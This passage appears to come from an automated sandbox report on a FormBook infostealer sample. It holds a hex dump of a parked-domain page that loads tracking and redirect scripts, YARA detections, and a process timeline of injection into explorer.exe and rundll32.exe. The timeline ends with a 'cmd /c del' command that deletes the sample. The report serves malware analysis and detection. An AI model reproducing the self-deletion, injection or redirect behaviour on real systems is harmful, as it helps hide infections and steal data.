54 44 6c 47 63 33 56 49 55 33 5a 4f 53 30 5a 33 62 6b 55 79 64 30 70 46 5a 6c 59 30 53 6b 56 47 53 54 64 76 54 33 59 35 56 58 45 78 54 56 68 76 57 55 5a 53 65 6e 5a 43 5a 32 34 72 56 58 46 70 56 48 5a 76 5a 58 70 57 4f 57 39 45 4c 30 4e 78 56 57 30 7a 4f 47 64 4b 64 6c 46 42 65 45 45 3d 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 75 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 61 74 63 68 28 65 72 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 31 33 30 31 37 27 20 62 3d 27 31 35 30 34 35 27 20 63 3d 27 74 72 61 73 70 6f 72 74 65 73 65 6d 6d 61 6e 75 65 6c 2e 63 6f 6d 27 20 64 3d 27 65 6e 74 69 74 79 5f 6d 61 70 70 65 64 27 22 20 2f 3e 3c 74 69 74 6c 65 3e 54 72 61 73 70 6f 72 74 65 73 65 6d 6d 61 6e 75 65 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d
                                          Data Ascii: 3e56<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://findquickresultsnow.com/px.js?ch=1"></script><script type="text/javascript" src="http://findquickresultsnow.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://findquickresultsnow.com/sk-logabpstatus.php?a=STMvMU1NUXNuczg2amZOVXF2dW1UNHVqaGVZMDl2R3h3WHhWRXFITkk3RGVlMTRVeWQ2cXdQa01GTDlGc3VIU3ZOS0Z3bkUyd0pFZlY0SkVGSTdvT3Y5VXExTVhvWUZSenZCZ24rVXFpVHZvZXpWOW9EL0NxVW0zOGdKdlFBeEE=&b="+abp;document.body.appendChild(imglog);if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='13017' b='15045' c='trasportesemmanuel.com' d='entity_mapped'" /><title>Trasportesemmanuel.com</title><m


                                          Code Manipulations

                                          Statistics

                                          Behavior


                                          System Behavior

                                          General

                                          Start time:17:53:57
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\Inquiry-URGENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\Inquiry-URGENT.exe'
                                          Imagebase:0x710000
                                          File size:443904 bytes
                                          MD5 hash:001127EA6A36D3B93E8C54FF1B8F22B8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.671196204.0000000002AE1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.671240839.0000000002B43000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:17:54:00
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\Inquiry-URGENT.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\Inquiry-URGENT.exe
                                          Imagebase:0x5d0000
                                          File size:443904 bytes
                                          MD5 hash:001127EA6A36D3B93E8C54FF1B8F22B8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:17:54:02
                                          Start date:27/09/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff6fee60000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          General

                                          Start time:17:54:35
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                          Imagebase:0xb90000
                                          File size:61952 bytes
                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          General

                                          Start time:17:54:40
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:17:54:41
                                          Start date:27/09/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis
